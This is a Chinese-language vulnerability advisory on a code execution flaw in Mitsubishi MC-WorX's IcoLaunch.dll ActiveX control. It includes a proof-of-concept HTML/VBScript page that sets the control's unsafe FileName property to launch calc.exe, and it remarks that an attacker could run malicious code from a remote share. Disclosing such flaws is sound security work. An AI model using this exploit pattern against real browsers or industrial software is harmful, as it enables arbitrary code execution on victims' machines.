WorX 'IcoLaunch.dll'' ActiveX 控件远程代码执行漏洞

发布日期:2013-09-15
更新日期:2013-09-17

受影响系统:
Mitsubishi MC-WorX 8.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62414

Mitsubishi MC-WorX是基于计算机的软件提供,包括高度集成的软件组件。

Mitsubishi MC-WorX 8.02的LaunchCtl ActiveX控件(IcoLaunch.dll)提供了不安全的"FileName"属性,远程攻击者可利用此漏洞在受影响应用上下文中执行任意代码。

<*来源:Blake
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D'></object>
<!--
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Vendor:
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Download: ?ID=035000000000000001000000908800000
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
-->

<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>

<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Mitsubishi
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/835a45b4081bd21fb0c5a05a8d4e0b33.html